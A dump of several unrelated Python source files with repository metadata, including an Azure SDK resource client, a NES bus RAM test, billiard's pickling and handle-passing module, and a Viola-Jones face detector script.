self, resource_id, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create a resource by ID.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param parameters: Create or update resource parameters.
:type parameters:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GenericResource or
ClientRawResponse<GenericResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_by_id_initial(
resource_id=resource_id,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update_by_id.metadata = {'url': '/{resourceId}'}
def _update_by_id_initial(
self, resource_id, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.update_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GenericResource')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_by_id(
self, resource_id, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates a resource by ID.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param parameters: Update resource parameters.
:type parameters:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GenericResource or
ClientRawResponse<GenericResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_by_id_initial(
resource_id=resource_id,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_by_id.metadata = {'url': '/{resourceId}'}
def get_by_id(
self, resource_id, custom_headers=None, raw=False, **operation_config):
"""Gets a resource by ID.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: GenericResource or ClientRawResponse if raw=true
:rtype:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_by_id.metadata = {'url': '/{resourceId}'}
| [
"[email protected]"
]
| |
eb7ae1ac126c5b743c4c5ef5c4ccf26c00e3fe0b | 6468584be4f1400ca18dabe59a5c0f05e1f45b03 | /dsl/features/create_ngram_matrix.py | 6e9dd4263e7604fd6bf0246dd03e788605d20f6d | [
"MIT"
]
| permissive | juditacs/dsl | 824e04e77d7bf44aab7e0b820b3f36fea9f09e87 | d6212cb2ff0755ceed8f37ee2f80ab47c9dc780c | refs/heads/master | 2021-01-14T13:21:52.215072 | 2020-04-16T09:32:02 | 2020-04-16T09:32:02 | 35,669,552 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | from sys import argv, stderr
import cPickle
from featurize import Tokenizer, Featurizer
from dsl.representation.model import Representation
def main():
N = int(argv[1]) if len(argv) > 1 else 3
t = Tokenizer(filter_punct=True, ws_norm=True, strip=True, replace_digits=True)
f = Featurizer(t, N=N)
f.featurize_in_directory(argv[2])
stderr.write('Featurized\n')
#m = f.to_dok_matrix(docs)
f.get_correlations()
stderr.write('Means computed\n')
f.label_feat_pearson()
stderr.write('Correlations computed\n')
cut = int(argv[4]) if len(argv) > 4 else 40
f.filter_top_ngrams(cut)
stderr.write('Top ngrams filtered\n')
f.save_features('train_features')
mtx = f.to_dok_matrix()
with open('train_mtx.cPickle', 'wb') as fh:
cPickle.dump((f.labels.l, mtx), fh, -1)
stderr.write('Data read\n')
stderr.write('Trained\n')
test_f = Featurizer(t, N=N)
test_f.featdict = f.featdict
test_f.featdict.freeze_dict()
test_f.featurize_in_directory(argv[3])
docs = test_f.filter_ngrams(test_f.docs, f.topngrams)
test_f.docs = docs
test_f.topngrams = f.topngrams
test_f.save_features('test_features')
test_f.featdict.save('topfeatures')
test_mtx = test_f.to_dok_matrix()
with open('test_mtx.cPickle', 'wb') as fh:
cPickle.dump((test_f.labels.l, test_mtx), fh, -1)
acc = 0
stderr.write('Test matrix done\n')
r = Representation('dummy', 'svm', svm_ktype='svc')
r.encode(mtx)
stderr.write('Encoded\n')
r.train_classifier(f.labels.l)
for i in xrange(test_mtx.shape[0]):
gold = test_f.labels.l[i]
cl = r.classify_vector(test_mtx.getrow(i).todense())[0]
if gold == cl:
acc += 1
print float(acc) / test_mtx.shape[0]
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
4f31d3739a8a0169184bb538944118b6f95aec4a | fd4df5cf34f8427153bf01d25c39ded9315b8d6a | /tests/test_ram.py | 7a12aff7cec9d97af7a57edbc2623b3b2f0b1518 | [
"BSD-2-Clause"
]
| permissive | jepebe/nes | 9ac00e89cf474b7811020d18bf7fd8f15b556339 | 79e6ad689473b7a3a4f3b6d7cf2c381220fcf140 | refs/heads/master | 2023-01-05T22:38:30.714836 | 2020-10-26T07:33:10 | 2020-10-26T07:33:10 | 300,615,959 | 1 | 1 | null | 2020-10-26T07:33:11 | 2020-10-02T13:01:36 | Python | UTF-8 | Python | false | false | 567 | py | from nes.bus import Bus
class TestCartridge:
def cpu_write(self, addt, value):
return None
def cpu_read(self, addr):
return None
def test_ram():
bus = Bus()
bus.insert_cartridge(TestCartridge())
for addr in range(0x0000, 0x800):
bus.cpu_write(addr, 0xff)
assert bus.cpu_read(addr) == 0xff
bus.cpu_write(0x700, 0x7f)
assert bus.cpu_read(0x700) == 0x7f
assert bus.cpu_read(0x700 + 0x800) == 0x7f
assert bus.cpu_read(0x700 + 0x800 * 2) == 0x7f
assert bus.cpu_read(0x700 + 0x800 * 3) == 0x7f
| [
"[email protected]"
]
| |
af1f62d0bf863e6597fbe007f00340142d4450ce | 16b2c2365eff11f34ae260321e6dde78ab09b45d | /api/api_services/PersonService.py | 14c5f4056460582f3abd2dd4a7f5dc56475455ed | []
| no_license | laken11/TMS | bf941802e350a16db0f2314330ad315e73ce48f0 | c271f2cbb1624ab943c10bacaa6406ec8ca08083 | refs/heads/dev | 2023-04-27T22:03:38.811267 | 2021-05-08T12:06:54 | 2021-05-08T12:06:54 | 362,518,465 | 0 | 0 | null | 2021-05-05T10:07:54 | 2021-04-28T15:27:28 | Python | UTF-8 | Python | false | false | 1,823 | py | from abc import ABCMeta, abstractmethod
from typing import List
from api.api_dto.PersonDto import *
from api.api_repository.PersonRepository import PersonRepository
class PersonManagementService(metaclass=ABCMeta):
@abstractmethod
def create_person(self, model: CreatePersonDto):
"""Create a person object"""
raise NotImplementedError
@abstractmethod
def update_person(self, person_id, model: UpdatePersonDto):
"""Update a person object"""
raise NotImplementedError
@abstractmethod
def list_person(self) -> List[ListPersonDto]:
"""List all person objects"""
raise NotImplementedError
@abstractmethod
def person_details(self, person_id, model: PersonDetailsDto):
"""Details of a person object"""
raise NotImplementedError
@abstractmethod
def update_person_role(self, person_id, model: UpdatePersonRoleDto):
"""Updating a person role"""
raise NotImplementedError
class DefaultPersonManagementService(PersonManagementService):
repository: PersonRepository
def __init__(self, repository: PersonRepository):
self.repository = repository
def create_person(self, model: CreatePersonDto):
return self.repository.create_person(model=model)
def update_person(self, person_id, model: UpdatePersonDto):
return self.update_person(person_id=person_id, model=model)
def list_person(self) -> List[ListPersonDto]:
return self.repository.list_person()
def person_details(self, person_id, model: PersonDetailsDto):
return self.repository.person_details(person_id=person_id, model=model)
def update_person_role(self, person_id, model: UpdatePersonRoleDto):
return self.repository.update_person_role(person_id=person_id, model=model) | [
"[email protected]"
]
| |
7fc48ac64107c97a8357f111ccd641bcaaf880af | aca01c2d073cc9ca2b71e12b8ed87a13a3d61438 | /design-patterns/src/iterators-ksiazka-adresowa.py | bed9ad1fa41d7eb0c99cdd60435c1395e01f065b | [
"MIT"
]
| permissive | sli1989/book-python | ee2ee0f37b3173b6921db722a4cb2593d6df1f2b | 51ea279bcc26c4b9b8a1d726e2683c019a28d62b | refs/heads/master | 2020-04-15T11:39:07.209256 | 2019-01-06T23:27:55 | 2019-01-06T23:27:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 792 | py | class Kontakt:
def __init__(self, imie, nazwisko, adresy=[]):
self.imie = imie
self.nazwisko = nazwisko
self.adresy = adresy
class Adres:
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
kontakt = Kontakt(imie='Pan', nazwisko='Twardowski', adresy=[
Adres(ulica='2101 E NASA Pkwy', miasto='Houston', stan='Texas',
kod='77058', panstwo='USA'),
Adres(ulica=None, miasto='Kennedy Space Center', kod='32899',
panstwo='USA'),
Adres(ulica='4800 Oak Grove Dr', miasto='Pasadena', kod='91109',
panstwo='USA'),
Adres(ulica='2825 E Ave P', miasto='Palmdale', stan='California',
kod='93550', panstwo='USA'),
])
for adres in kontakt:
print(adres)
| [
"[email protected]"
]
| |
d8074cdceef3099fac3b9fe5188dce7732392b2d | c8efab9c9f5cc7d6a16d319f839e14b6e5d40c34 | /source/Clarification/Backtracking/生成括号.py | 79c4cbc77e31405a0b2e94b1f993c9dc312741f0 | [
"MIT"
]
| permissive | zhangwang0537/LeetCode-Notebook | 73e4a4f2c90738dea4a8b77883b6f2c59e02e9c1 | 1dbd18114ed688ddeaa3ee83181d373dcc1429e5 | refs/heads/master | 2022-11-13T21:08:20.343562 | 2020-04-09T03:11:51 | 2020-04-09T03:11:51 | 277,572,643 | 0 | 0 | MIT | 2020-07-06T14:59:57 | 2020-07-06T14:59:56 | null | UTF-8 | Python | false | false | 685 | py | # 给出 n 代表生成括号的对数,请你写出一个函数,使其能够生成所有可能的并且有效的括号组合。
#
# 例如,给出 n = 3,生成结果为:
#
# [
# "((()))",
# "(()())",
# "(())()",
# "()(())",
# "()()()"
# ]
class Solution:
def generateParenthesis(self, n: int) -> List[str]:
ans = []
def backtrack(s='',left=0,right=0):
if len(s) == 2 * n:
ans.append(s)
return
if left < n:
backtrack(s+'(',left+1,right)
if right < left:
backtrack(s+')',left,right+1)
backtrack()
return ans | [
"[email protected]"
]
| |
eb7c72bc1dfe900c646c7d26ddc66400e27f3755 | 60f9b5dce4d11f1e89da620915918dacba738b45 | /billiard/reduction.py | 11ea7c4913c98a398df8837bd3ac3dfc3807ca5e | [
"BSD-3-Clause"
]
| permissive | dexter-xiong/billiard | 5e7497a29d14b11b19cab5008110e69d3c9bae19 | 0fedae7cb7c7408a4287e3d161b4f2b63541c279 | refs/heads/master | 2020-12-31T01:36:59.953134 | 2014-12-18T20:58:25 | 2014-12-18T20:58:25 | 33,759,423 | 0 | 0 | null | 2015-04-11T02:25:20 | 2015-04-11T02:25:20 | null | UTF-8 | Python | false | false | 8,976 | py | #
# Module which deals with pickling of objects.
#
# multiprocessing/reduction.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
import functools
import io
import os
import pickle
import socket
import sys
__all__ = ['send_handle', 'recv_handle', 'ForkingPickler', 'register', 'dump']
PY3 = sys.version_info[0] == 3
HAVE_SEND_HANDLE = (sys.platform == 'win32' or
(hasattr(socket, 'CMSG_LEN') and
hasattr(socket, 'SCM_RIGHTS') and
hasattr(socket.socket, 'sendmsg')))
#
# Pickler subclass
#
if PY3:
import copyreg
class ForkingPickler(pickle.Pickler):
'''Pickler subclass used by multiprocessing.'''
_extra_reducers = {}
_copyreg_dispatch_table = copyreg.dispatch_table
def __init__(self, *args):
super(ForkingPickler, self).__init__(*args)
self.dispatch_table = self._copyreg_dispatch_table.copy()
self.dispatch_table.update(self._extra_reducers)
@classmethod
def register(cls, type, reduce):
'''Register a reduce function for a type.'''
cls._extra_reducers[type] = reduce
@classmethod
def dumps(cls, obj, protocol=None):
buf = io.BytesIO()
cls(buf, protocol).dump(obj)
return buf.getbuffer()
@classmethod
def loadbuf(cls, buf, protocol=None):
return cls.loads(buf.getbuffer(), protocol)
loads = pickle.loads
else:
class ForkingPickler(pickle.Pickler): # noqa
'''Pickler subclass used by multiprocessing.'''
dispatch = pickle.Pickler.dispatch.copy()
@classmethod
def register(cls, type, reduce):
'''Register a reduce function for a type.'''
def dispatcher(self, obj):
rv = reduce(obj)
self.save_reduce(obj=obj, *rv)
cls.dispatch[type] = dispatcher
@classmethod
def dumps(cls, obj, protocol=None):
buf = io.BytesIO()
cls(buf, protocol).dump(obj)
return buf.getvalue()
@classmethod
def loadbuf(cls, buf, protocol=None):
return cls.load(buf, protocol)
loads = pickle.loads
register = ForkingPickler.register
def dump(obj, file, protocol=None):
'''Replacement for pickle.dump() using ForkingPickler.'''
ForkingPickler(file, protocol).dump(obj)
#
# Platform specific definitions
#
if sys.platform == 'win32':
# Windows
__all__ += ['DupHandle', 'duplicate', 'steal_handle']
import _winapi
def duplicate(handle, target_process=None, inheritable=False):
'''Duplicate a handle. (target_process is a handle not a pid!)'''
if target_process is None:
target_process = _winapi.GetCurrentProcess()
return _winapi.DuplicateHandle(
_winapi.GetCurrentProcess(), handle, target_process,
0, inheritable, _winapi.DUPLICATE_SAME_ACCESS)
def steal_handle(source_pid, handle):
'''Steal a handle from process identified by source_pid.'''
source_process_handle = _winapi.OpenProcess(
_winapi.PROCESS_DUP_HANDLE, False, source_pid)
try:
return _winapi.DuplicateHandle(
source_process_handle, handle,
_winapi.GetCurrentProcess(), 0, False,
_winapi.DUPLICATE_SAME_ACCESS | _winapi.DUPLICATE_CLOSE_SOURCE)
finally:
_winapi.CloseHandle(source_process_handle)
def send_handle(conn, handle, destination_pid):
'''Send a handle over a local connection.'''
dh = DupHandle(handle, _winapi.DUPLICATE_SAME_ACCESS, destination_pid)
conn.send(dh)
def recv_handle(conn):
'''Receive a handle over a local connection.'''
return conn.recv().detach()
class DupHandle(object):
'''Picklable wrapper for a handle.'''
def __init__(self, handle, access, pid=None):
if pid is None:
# We just duplicate the handle in the current process and
# let the receiving process steal the handle.
pid = os.getpid()
proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False, pid)
try:
self._handle = _winapi.DuplicateHandle(
_winapi.GetCurrentProcess(),
handle, proc, access, False, 0)
finally:
_winapi.CloseHandle(proc)
self._access = access
self._pid = pid
def detach(self):
'''Get the handle. This should only be called once.'''
# retrieve handle from process which currently owns it
if self._pid == os.getpid():
# The handle has already been duplicated for this process.
return self._handle
# We must steal the handle from the process whose pid is self._pid.
proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False,
self._pid)
try:
return _winapi.DuplicateHandle(
proc, self._handle, _winapi.GetCurrentProcess(),
self._access, False, _winapi.DUPLICATE_CLOSE_SOURCE)
finally:
_winapi.CloseHandle(proc)
else:
# Unix
__all__ += ['DupFd', 'sendfds', 'recvfds']
import array
# On MacOSX we should acknowledge receipt of fds -- see Issue14669
ACKNOWLEDGE = sys.platform == 'darwin'
def sendfds(sock, fds):
'''Send an array of fds over an AF_UNIX socket.'''
fds = array.array('i', fds)
msg = bytes([len(fds) % 256])
sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds)])
if ACKNOWLEDGE and sock.recv(1) != b'A':
raise RuntimeError('did not receive acknowledgement of fd')
def recvfds(sock, size):
'''Receive an array of fds over an AF_UNIX socket.'''
a = array.array('i')
bytes_size = a.itemsize * size
msg, ancdata, flags, addr = sock.recvmsg(
1, socket.CMSG_LEN(bytes_size),
)
if not msg and not ancdata:
raise EOFError
try:
if ACKNOWLEDGE:
sock.send(b'A')
if len(ancdata) != 1:
raise RuntimeError(
'received %d items of ancdata' % len(ancdata),
)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
if len(cmsg_data) % a.itemsize != 0:
raise ValueError
a.frombytes(cmsg_data)
assert len(a) % 256 == msg[0]
return list(a)
except (ValueError, IndexError):
pass
raise RuntimeError('Invalid data received')
def send_handle(conn, handle, destination_pid): # noqa
'''Send a handle over a local connection.'''
fd = conn.fileno()
with socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM) as s:
sendfds(s, [handle])
def recv_handle(conn): # noqa
'''Receive a handle over a local connection.'''
fd = conn.fileno()
with socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM) as s:
return recvfds(s, 1)[0]
def DupFd(fd):
'''Return a wrapper for an fd.'''
from ..forking import Popen
return Popen.duplicate_for_child(fd)
#
# Try making some callable types picklable
#
def _reduce_method(m):
if m.__self__ is None:
return getattr, (m.__class__, m.__func__.__name__)
else:
return getattr, (m.__self__, m.__func__.__name__)
class _C:
def f(self):
pass
register(type(_C().f), _reduce_method)
def _reduce_method_descriptor(m):
return getattr, (m.__objclass__, m.__name__)
register(type(list.append), _reduce_method_descriptor)
register(type(int.__add__), _reduce_method_descriptor)
def _reduce_partial(p):
return _rebuild_partial, (p.func, p.args, p.keywords or {})
def _rebuild_partial(func, args, keywords):
return functools.partial(func, *args, **keywords)
register(functools.partial, _reduce_partial)
#
# Make sockets picklable
#
if sys.platform == 'win32':
def _reduce_socket(s):
from ..resource_sharer import DupSocket
return _rebuild_socket, (DupSocket(s),)
def _rebuild_socket(ds):
return ds.detach()
register(socket.socket, _reduce_socket)
else:
def _reduce_socket(s): # noqa
df = DupFd(s.fileno())
return _rebuild_socket, (df, s.family, s.type, s.proto)
def _rebuild_socket(df, family, type, proto): # noqa
fd = df.detach()
return socket.socket(family, type, proto, fileno=fd)
register(socket.socket, _reduce_socket)
| [
"[email protected]"
]
| |
309933581c5906d2db8e8db38c4eb5949f694987 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03157/s868052818.py | ec6805ad1b92df0a841e5a07b2af49a175993650 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,370 | py | from collections import defaultdict
H, W = map(int, input().split())
S = [input() for _ in range(H)]
es = defaultdict(list)
# あるマスについて左右見なくても右に向かってみていけば逆もとれる
for i in range(H):
for j in range(W):
if j < W-1 and S[i][j] != S[i][j+1]:
es[(i,j)].append((i,j+1))
es[(i,j+1)].append((i,j))
if i < H-1 and S[i][j] != S[i+1][j]:
es[(i,j)].append((i+1, j))
es[(i+1,j)].append((i, j))
checked = [[False for _ in range(W)] for H in range(H)]
ans = 0
for i in range(H):
for j in range(W):
if checked[i][j] == True:
continue
cnt_b = 0
cnt_w = 0
if S[i][j] == "#":
cnt_b += 1
else:
cnt_w += 1
checked[i][j] = True
stack = es[(i,j)]
while stack:
new_stack = []
for p,q in stack:
if checked[p][q] == False:
checked[p][q] = True
if S[p][q] == "#":
cnt_b += 1
else:
cnt_w += 1
new_stack.extend(es[(p,q)])
if len(new_stack) == 0:
break
else:
stack = new_stack
ans += cnt_b * cnt_w
print(ans) | [
"[email protected]"
]
| |
79db950c2f9450ff729d2ac03f6271965dd807cf | d5049c3b59b943a158389deaefe9c48970a43c6c | /Lab4/UI.py | e33e0458a9bc51d6e7bef9164a7954f72ed438a3 | []
| no_license | LauraDiosan-CS/lab04-gatsp-DiosDuck | 18e013df30b1a8d0e182190c693cad7da47e68d1 | 647ae011fa5edf7ea4a4187b684f351b0482c328 | refs/heads/master | 2022-04-22T20:47:47.311060 | 2020-03-27T17:59:05 | 2020-03-27T17:59:05 | 250,198,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | from Service import Service
class UI():
def __init__(self):
self.__service=None
def main(self):
while 1:
try:
x = input()
if x == "0":
return
elif x == "1":
file=input()
self.__service=Service(file,1)
self.__service.prob1()
print("Functie terminata")
elif x == "2":
file=input()
self.__service=Service(file,2)
self.__service.prob1()
print("Functie terminata")
else:
print("Error")
except FileNotFoundError:
print("Fisierul nu exista") | [
"[email protected]"
]
| |
21b6deb849e7b391aabeb811cc79bf8b7ccee1eb | 21238a26742309adb860a04174ea5360f729ad39 | /SourceCode/.history/Detector_20181224025625.py | b39a3a2293f57ceff29bef9d0e2a2f2758353cac | []
| no_license | Shehabalaa/Viola-Jones-Face-Detection | 5b5d0c3835e0de11658d35941fa3d19468452e93 | b6522b96394df8d67266b41a803bc30a93fc5c49 | refs/heads/master | 2020-04-23T03:08:56.976486 | 2019-06-23T10:39:25 | 2019-06-23T10:39:25 | 170,869,564 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,957 | py | from IntegralImage import toIntegralImage as toII
import cv2
import numpy as np
import random
from sklearn.cluster import MeanShift
from Cascade import Cascade
import itertools
import Utils
from math import floor
from functools import partial
from multiprocessing import Pool
base_detector_width = 24.
def preProcess(image, gamma=2):
image = cv2.blur(image,(5,5))
#image = cv2.equalizeHist(image)
# build a lookup table mapping the pixel values [0, 255] to
# their adjusted gamma values
invGamma = 1.0 / gamma
table = np.array([((i / 255.0) ** invGamma) * 255
for i in np.arange(0, 256)]).astype("uint8")
# apply gamma correction using the lookup table
image =cv2.LUT(image, table)
return image
def meanShift(points):
clustering = MeanShift().fit(points)
return clustering.cluster_centers_
def non_max_suppression_fast(boxes, overlapThresh):
# if there are no boxes, return an empty list
if len(boxes) == 0:
return []
# if the bounding boxes integers, convert them to floats --
# this is important since we'll be doing a bunch of divisions
if boxes.dtype.kind == "i":
boxes = boxes.astype("float")
# initialize the list of picked indexes
pick = []
# grab the coordinates of the bounding boxes
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
# compute the area of the bounding boxes and sort the bounding
# boxes by the bottom-right y-coordinate of the bounding box
area = (x2 - x1 + 1) * (y2 - y1 + 1)
idxs = np.argsort(y2)
# keep looping while some indexes still remain in the indexes
# list
while len(idxs) > 0:
# grab the last index in the indexes list and add the
# index value to the list of picked indexes
last = len(idxs) - 1
i = idxs[last]
pick.append(i)
# find the largest (x, y) coordinates for the start of
# the bounding box and the smallest (x, y) coordinates
# for the end of the bounding box
xx1 = np.maximum(x1[i], x1[idxs[:last]])
yy1 = np.maximum(y1[i], y1[idxs[:last]])
xx2 = np.minimum(x2[i], x2[idxs[:last]])
yy2 = np.minimum(y2[i], y2[idxs[:last]])
# compute the width and height of the bounding box
w = np.maximum(0, xx2 - xx1 + 1)
h = np.maximum(0, yy2 - yy1 + 1)
# compute the ratio of overlap
overlap = (w * h) / area[idxs[:last]]
# delete all indexes from the index list that have
idxs = np.delete(idxs, np.concatenate(([last],
np.where(overlap > overlapThresh)[0])))
# return only the bounding boxes that were picked using the
# integer data type
return boxes[pick].astype("int")
def detect(image,Evaluator):
w_h_pairs=[]
all_detected_squares = []
w = 24 # width and height are equals as i will scan image in squares
h = 24
offset_w = 2
offset_h = 2
image_parts_ranges=[]
image_parts_values=[]
while(w<200 and h < image.shape[0] and w<image.shape[1]):
r = list(range(0, image.shape[0]-h-1,int(offset_h)))
c = list(range(0,image.shape[1]-w-1,int(offset_w)))
new_range = list(itertools.product(r, c))
image_parts_ranges += list(itertools.product(r, c))
image_parts_values += list(map(lambda p: np.array(image[p[0]:p[0]+h, p[1]:p[1]+w]),new_range))
offset_w +=.5
offset_h +=.5
w = int(round(w*1.25))
h = int(round(h*1.25))
#for img in image_parts_values:
# cv2.imshow('a', img)
# cv2.waitKey(0)
image_parts_values = [cv2.resize(img,(24,24)) for img in image_parts_values]
image_parts_values_normalized = list(map(Utils.varianceNormalize,image_parts_values))
ii_parts_values = list(map(toII,image_parts_values_normalized))
all_detected_squares = [(image_parts_ranges[i],image_parts_values[i].shape) for i in Evaluator.predict(ii_parts_values)]
return all_detected_squares
'''
def detectScaleDetector(ii,Evaluator):
w_h_pairs=[]
all_detected_squares = []
w = 80 # width and height are equals as i will scan image in squares
h = int(1.25*(w))
offset_w = 10
offset_h = 10
ii_parts_ranges=[]
ii_parts_values=[]
while(w < ii.shape[0] and w<ii.shape[1]):
r = list(range(0, ii.shape[0]-h,offset_h))
c = list(range(0,ii.shape[1]-w,offset_w))
ii_parts_ranges = list(itertools.product(r, c))
ii_parts_values = list(map(lambda p: ii[p[0]:p[0]+h, p[1]:p[1]+w],ii_parts_ranges))
ii_parts_values = [cv2.resize(ii,(24,24)) for ii in ii_parts_values]
all_detected_squares += [ii_parts_ranges[i] for i in Evaluator.predict(ii_parts_values,(1,1)] #(w/24.,h/24.)
offset_w += 1
offset_h += 1
if(len(all_detected_squares)):
w_h_pairs.append((len(all_detected_squares), w,h))
w = int(round(w*1.5))
return all_detected_squares,w_h_pairs
'''
def main():
Evaluator = Cascade('../Cascade/')
#cap = cv2.VideoCapture(0)
#while(True):
# Capture frame-by-frame
#ret,frame = cap.read()
frame = cv2.imread("faces2.jpg")
frame = cv2.resize(frame,(600,400))
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#cv2.imshow('frame',gray)
#cv2.waitKey(0);
gray = cv2.blur(gray,(5,5))
recs = detect(gray,Evaluator)
#recs,w_h_pairs = detectFast(toII(Utils.varianceNormalize(gray)),Evaluator)
recs = np.array([[recs[i][0][1],recs[i][0][0],recs[i][0][1]+recs[i][1][1],recs[i][0][0]+recs[i][1][0]] for i in range(len(recs))])
recs = non_max_suppression_fast(recs,.1)
[cv2.rectangle(frame,(rec[0],rec[1]),(rec[2],rec[3]), (255, 0, 0), 2) for rec in recs ]
cv2.imshow('frame',frame)
cv2.waitKey(0)
cv2.imwrite("dtectedface2s.jpg")
#cap.release()
#cv2.destroyAllWindows()
if __name__ == "__main__":
main()
"""
Take raw frame before any previos processiong just in gray lvl
return hand's postion as x,y,w,h
w=30
h=30
doubts=[]
imagnge(len(res)):
if(res[i]==1):
